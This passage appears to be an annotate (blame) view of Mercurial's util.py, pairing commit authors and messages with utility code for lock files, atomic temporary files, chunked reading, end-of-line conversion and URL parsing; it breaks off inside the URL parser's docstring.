# probed first so that the legacy fallbacks below are only looked up when
# actually needed: time.clock no longer exists on Python 3.8+, and merely
# evaluating it there would raise AttributeError at import time.
timer = getattr(time, 'perf_counter', None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if timer is None:
        timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    if timer is None:
        timer = time.time
Matt Mackall
util: split out posix, windows, and win32 modules
r7890
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.

    A symlink pointing at ``info`` is tried first. If ``pathname`` already
    exists, the OSError (EEXIST) is propagated. For any other OSError, or
    when os has no symlink support, a plain file is created exclusively
    and ``info`` is written into it.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    try:
        os.write(ld, info)
    finally:
        # always release the descriptor, even when the write fails
        os.close(ld)
Matt Mackall
util: split out posix, windows, and win32 modules
def readlock(pathname):
    '''Return the content of the lock at ``pathname``.

    The lock is read as a symlink target first. When that fails with
    EINVAL or ENOSYS, or when no symlink support is available, the lock
    is read as a regular file in binary mode instead. Other OSErrors are
    propagated.
    '''
    fallbackerrnos = (errno.EINVAL, errno.ENOSYS)
    try:
        return readlink(pathname)
    except AttributeError: # no symlink in os
        pass
    except OSError as why:
        if why.errno not in fallbackerrnos:
            raise
    with posixfile(pathname, 'rb') as lockfile:
        return lockfile.read()
Thomas Arendsen Hein
Make makelock and readlock work on filesystems without symlink support....
r704
Vadim Gelfer
fix file handling bugs on windows....
def fstat(fp):
    '''stat file object that may not have fileno method.

    Falls back to stat-ing ``fp.name`` when an AttributeError is raised
    while going through the file descriptor.
    '''
    try:
        fd = fp.fileno()
        return os.fstat(fd)
    except AttributeError:
        return os.stat(fp.name)
Matt Mackall
imported patch folding
r3784 # File system features
Martin von Zweigbergk
util: rename checkcase() to fscasesensitive() (API)...
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.

    The final component is case-folded and stat'ed again: only when the
    folded name yields the same stat result as the original is the
    filesystem reported as case-insensitive.
    """
    origstat = os.lstat(path)
    parent, leaf = os.path.split(path)
    folded = leaf.upper()
    if folded == leaf:
        folded = leaf.lower()
    if folded == leaf:
        return True # no evidence against case sensitivity
    try:
        foldedstat = os.lstat(os.path.join(parent, folded))
    except OSError:
        # the folded name does not exist
        return True
    return foldedstat != origstat
Bryan O'Sullivan
matcher: use re2 bindings if available...
try:
    import re2
    # None means "available, but not yet checked"
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    '''regular expression front end that uses re2 when it is usable'''

    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        supported = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not (flags & ~supported):
            # re2 takes flags inline, as a prefix of the pattern
            prefix = ''
            if flags & remod.MULTILINE:
                prefix += '(?m)'
            if flags & remod.IGNORECASE:
                prefix += '(?i)'
            try:
                return re2.compile(prefix + pat)
            except re2.error:
                pass
            pat = prefix + pat
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
Bryan O'Sullivan
matcher: use re2 bindings if available...
r16943
Paul Moore
Add a new function, fspath...
# directory path -> {normcase-ed entry name: entry name as stored on disk}
_fspathcache = {}

def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.

    Returns name with every component that could be found on disk replaced
    by its stored spelling; separators and components that were not found
    are kept as given.
    '''
    def _makefspathcacheentry(dirpath):
        return dict((normcase(n), n) for n in os.listdir(dirpath))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # The result must be assigned: strings are immutable, and an unescaped
    # backslash inside the character classes below would escape the
    # following separator instead of matching itself.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))

    dirpath = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dirpath not in _fspathcache:
            _fspathcache[dirpath] = _makefspathcacheentry(dirpath)
        contents = _fspathcache[dirpath]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dirpath] = contents = _makefspathcacheentry(dirpath)
            found = contents.get(part)

        result.append(found or part)
        # descend using the name as given
        dirpath = os.path.join(dirpath, part)

    return ''.join(result)
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
def checknlink(testfile):
    '''check whether hardlink count reporting works properly

    Two temporary files are created next to ``testfile``, hardlinked to
    each other, and the link count of the second is checked while it is
    held open. Returns False when an OSError occurs along the way. The
    temporary files are removed before returning.
    '''
    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    first = second = handle = None
    try:
        fd, first = pycompat.mkstemp(
            prefix='.%s-' % os.path.basename(testfile),
            suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        second = '%s2~' % first[:-2]

        oslink(first, second)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        handle = posixfile(second)
        return nlinks(second) > 1
    except OSError:
        return False
    finally:
        if handle is not None:
            handle.close()
        for leftover in (first, second):
            if leftover is None:
                continue
            try:
                os.unlink(leftover)
            except OSError:
                pass
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938
Shun-ichi GOTO
Add endswithsep() and use it instead of using os.sep and os.altsep directly....
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # a falsy altsep is returned as is
    return altsep and path.endswith(altsep)
Shun-ichi GOTO
Add endswithsep() and use it instead of using os.sep and os.altsep directly....
r5843
Shun-ichi GOTO
Add util.splitpath() and use it instead of using os.sep directly....
def splitpath(path):
    '''Split path by os.sep.

    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    separator = pycompat.ossep
    return path.split(separator)
Shun-ichi GOTO
Add util.splitpath() and use it instead of using os.sep directly....
r5844
Boris Feld
update: fix edge-case with update.atomic-file and read-only files...
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file. If name does not exist, the
    (empty) temporary file is returned as-is. Any other failure removes
    the temporary file and re-raises the error.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want.  If the original file already exists, just copy
    # its mode.  Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        # Close both handles even when the copy fails, so that the
        # cleanup below never has to unlink a file that is still open.
        try:
            ofp = posixfile(temp, "wb")
            try:
                for chunk in filechunkiter(ifp):
                    ofp.write(chunk)
            finally:
                ofp.close()
        finally:
            ifp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
Vadim Gelfer
fix file handling bugs on windows....
r2176
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; 'stat' is None if path is missing."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from the descriptor behind file object fp."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            # either side has no stat (or 'old' is not a filestat)
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.

        Returns False when either side has no stat to compare.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except (AttributeError, TypeError):
            # AttributeError: 'old' has no 'stat' attribute at all.
            # TypeError: a 'stat' of None (missing file) is not
            # subscriptable.
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path', and is expected to
        carry a real stat result (its mtime is read unconditionally).

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # keep the advanced timestamp within a signed 32-bit range
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
Benoit Boissinot
use new style classes
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        truncating = 'w' in mode
        self.__name = name      # permanent name
        self._tempname = mktempcopy(name, emptyok=truncating,
                                    createmode=createmode,
                                    enforcewritable=truncating)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # expose the underlying file's bound methods directly
        for delegated in ('read', 'write', 'seek', 'tell', 'fileno'):
            setattr(self, delegated, getattr(self._fp, delegated))

    def close(self):
        '''Finish writing and move the temporary copy over the target.'''
        if self._fp.closed:
            return
        self._fp.close()
        filename = localpath(self.__name)
        # Only look at the previous stat when ambiguity checking was asked
        # for, and do so before the rename replaces the file.
        oldstat = self._checkambig and filestat.frompath(filename)
        hadoriginal = oldstat and oldstat.stat
        rename(self._tempname, filename)
        if not hadoriginal:
            return
        newstat = filestat.frompath(filename)
        if newstat.isambig(oldstat):
            # stat of changed file is ambiguous to original one
            advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
            os.utime(filename, (advanced, advanced))

    def discard(self):
        '''Throw away the temporary copy without touching the target.'''
        if self._fp.closed:
            return
        try:
            os.unlink(self._tempname)
        except OSError:
            pass
        self._fp.close()

    def __del__(self):
        # '_fp' is missing when the constructor failed before opening it
        if safehasattr(self, '_fp'):
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is None:
            self.close()
        else:
            self.discard()
Kyle Lippincott
unlinkpath: make empty directory removal optional (issue5901) (issue5826)...
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """Remove file f, then optionally prune directories left empty.

    With ignoremissing, the removal goes through tryunlink(); otherwise
    unlink() is used. With rmdir, removedirs() is attempted on the
    file's directory and any OSError from it is ignored.
    """
    remover = tryunlink if ignoremissing else unlink
    remover(f)
    if not rmdir:
        return
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
Ryan McElroy
util: unify unlinkpath...
r31539
Ryan McElroy
util: add tryunlink function...
def tryunlink(f):
    """Remove file f; a file that is already gone (ENOENT) is not an error."""
    try:
        unlink(f)
    except OSError as inst:
        if inst.errno == errno.ENOENT:
            return
        raise
Angel Ezquerra
util: add notindexed optional parameter to makedirs function
def makedirs(name, mode=None, notindexed=False):
    """Create directory name, creating missing parents recursively.

    Directories that already exist are left alone (and not chmod'ed).
    When mode is given, it is applied with os.chmod() to each directory
    this call creates.

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as firsterr:
        code = firsterr.errno
        if code == errno.EEXIST:
            return
        if not name or code != errno.ENOENT:
            raise
        parentdir = os.path.dirname(os.path.abspath(name))
        if parentdir == name:
            raise
        makedirs(parentdir, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as retryerr:
            # Someone else may have created it meanwhile: EEXIST is fine
            if retryerr.errno != errno.EEXIST:
                raise
            return
    if mode is not None:
        os.chmod(name, mode)
Bryan O'Sullivan
scmutil: create directories in a race-safe way during update...
r18668
Dan Villiom Podlaski Christiansen
util: add readfile() & writefile() helper functions...
def readfile(path):
    """Return the entire content of the file at path, read in binary mode."""
    with open(path, 'rb') as source:
        content = source.read()
    return content
Dan Villiom Podlaski Christiansen
util: add readfile() & writefile() helper functions...
r14099
Dan Villiom Podlaski Christiansen
util & scmutil: adapt read/write helpers as request by mpm
def writefile(path, text):
    """Replace the content of the file at path with text (binary mode)."""
    with open(path, 'wb') as target:
        target.write(text)
def appendfile(path, text):
    """Add text to the end of the file at path (binary mode)."""
    with open(path, 'ab') as target:
        target.write(text)
Eric Hopper
Created a class in util called chunkbuffer that buffers reads from an...
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # Chunks over 1 MiB are re-cut into 256 KiB pieces.
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # chunks pulled from the iterator but not yet fully handed out
        self._queue = collections.deque()
        # how much of self._queue[0] has already been returned
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        queue = self._queue
        if l is None:
            # Hand out whatever an earlier sized read left buffered before
            # draining the iterator; otherwise that data would be lost.
            buf = []
            if queue:
                buf.append(queue.popleft()[self._chunkoffset:])
                self._chunkoffset = 0
                buf.extend(queue)
                queue.clear()
            buf.extend(self.iter)
            return ''.join(buf)

        left = l
        buf = []
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # the request is now fully satisfied
                break

        return ''.join(buf)
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758
Mads Kiilerich
util: increase filechunkiter size to 128k...
def filechunkiter(f, size=131072, limit=None):
    """Generate the content of file object f piece by piece.

    Each piece is requested with at most size bytes (default 131072),
    and reading stops once limit bytes have been produced (by default
    everything is read). Pieces may be shorter than size when they are
    the last one, or when f is a socket or some other kind of file that
    sometimes returns less data than requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    remaining = limit
    while True:
        want = size if remaining is None else min(remaining, size)
        if not want:
            return
        data = f.read(want)
        if not data:
            return
        if remaining:
            remaining -= len(data)
        yield data
Bryan O'Sullivan
Fix up representation of dates in hgweb....
r1320
Gregory Szorc
util: add a file object proxy that can read at most N bytes...
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        """Read up to n bytes (everything still allowed when n < 0)."""
        budget = self._left
        if not budget:
            return b''

        want = budget if n < 0 else min(n, budget)
        chunk = self._fh.read(want)
        self._left = budget - len(chunk)
        assert self._left >= 0

        return chunk

    def readinto(self, b):
        """Fill the start of buffer b; return the number of bytes stored."""
        data = self.read(len(b))
        if data is None:
            return None

        size = len(data)
        b[:size] = data
        return size
Bryan O'Sullivan
util: generalize bytecount to unitcountfn...
def unitcountfn(*unittable):
    '''build a function that renders a quantity in a readable unit

    Each entry of unittable is a (multiplier, divisor, format) triple.
    The first entry whose "divisor * multiplier" does not exceed the
    absolute value of the count is used to format "count / divisor".
    If no entry applies, the format of the last entry is applied to the
    raw count.
    '''

    def go(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            threshold = divisor * multiplier
            if magnitude >= threshold:
                return fmt % (count / float(divisor))
        fallbackfmt = unittable[-1][2]
        return fallbackfmt % count

    return go
Denis Laxalde
revset: factor out linerange processing into a utility function...
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    span = toline - fromline
    # A reversed range is reported before a non-positive start.
    if span < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    start = fromline - 1
    return start, toline
Bryan O'Sullivan
util: generalize bytecount to unitcountfn...
# Renderer for byte counts, built once at import time.  Each row is a
# (multiplier, divisor, format) triple for unitcountfn; rows go from the
# largest threshold to the smallest, and within each unit the number of
# decimals grows as the value gets smaller.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
class transformingwriter(object):
    """Writable file wrapper to transform data by function

    Everything passed to write() goes through the 'encode' callable
    before reaching the wrapped file object; close() and flush() are
    forwarded unchanged.
    """

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        """Close the wrapped file object."""
        self._fp.close()

    def flush(self):
        """Flush the wrapped file object."""
        self._fp.flush()

    def write(self, data):
        """Write the encoded form of data; return what the wrapped
        file's write() returns."""
        encoded = self._encode(data)
        return self._fp.write(encoded)
Yuya Nishihara
util: extract pure tolf/tocrlf() functions from eol extension...
# One end-of-line marker: either a LF on its own, or a CRLF whose CR may
# be repeated (the extra CRs are dropped).  Old Macintosh files are not
# supported, so a stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Return s with every end-of-line marker replaced by LF."""
    converted = _eolre.sub('\n', s)
    return converted

def tocrlf(s):
    """Return s with every end-of-line marker replaced by CRLF."""
    converted = _eolre.sub('\r\n', s)
    return converted
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
def _crlfwriter(fp):
    """Wrap fp so that everything written to it goes through tocrlf()."""
    writer = transformingwriter(fp, tocrlf)
    return writer
Yuya Nishihara
util: add helper to convert between LF and native EOL...
# Select the native-EOL helpers once, at import time: where the platform
# line separator is CRLF, conversions and the writer wrapper are real;
# everywhere else all three names are the identity function.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
Yuya Nishihara
util: add helper to convert between LF and native EOL...
r31777
Jun Wu
util: improve iterfile so it chooses code path wisely...
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate over the lines of fp by calling fp.readline()
            until it returns an empty string."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield the lines of fp, reading its descriptor with
            os.read() and retrying reads interrupted by EINTR."""
            fd = fp.fileno()
            # text of the current, not yet terminated line
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # unterminated tail: keep it for the next read
                            line = l
                if not buf:
                    # an empty read means end of file
                    break
            if line:
                # final line without a trailing newline
                yield line

    def iterfile(fp):
        """Return an iterable over the lines of fp.

        fp itself is returned unless it is a plain 'file' object that is
        not backed by a regular file; that case goes through
        _safeiterfile().
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return fp unchanged; it can be iterated directly."""
        return fp
Jun Wu
util: add iterfile to workaround a fileobj.__iter__ issue with EINTR...
r30395
Alexander Solovyov <piranha at piranha.org.ua>
templater: ability to display diffstat for log-like commands
def iterlines(iterator):
    """Yield, one by one, the lines of every chunk produced by iterator.

    Each chunk is split with splitlines(), so line terminators are not
    part of what is yielded.
    """
    for block in iterator:
        pieces = block.splitlines()
        for piece in pieces:
            yield piece
Alexander Solovyov
make path expanding more consistent...
r9610
def expandpath(path):
    """Expand environment variables, then a leading "~", in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
Patrick Mezard
Find right hg command for detached process...
r10239
Roman Sokolov
dispatch: support for $ escaping in shell-alias definition...
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    The keys of mapping are the names expected after the prefix; they are
    inserted into the regular expression as-is. mapping itself is never
    modified.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    If there is nothing to look for (empty mapping and no escape_prefix),
    s is returned unchanged.
    """
    fn = fn or (lambda s: s)
    alternatives = list(mapping.keys())
    if escape_prefix:
        alternatives.append(prefix)
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Register the doubled prefix on a private copy, so the caller's
        # mapping is left untouched.
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    if not alternatives:
        # An empty alternation would match a bare prefix and then fail
        # the lookup below.
        return s
    patterns = b'|'.join(alternatives)
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    # x.group() is the prefix character plus the matched name
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
Brodie Rao
mail/hgweb: support service names for ports (issue2350)...
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        number = int(port)
    except ValueError:
        # not numeric: treat it as a service name below
        pass
    else:
        return number

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        message = _("no port number associated with service '%s'") % port
        raise error.Abort(message)
Augie Fackler
parsebool: create new function and use it for config parsing
r12087
Brodie Rao
url: move URL parsing functions into util to improve startup time...
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
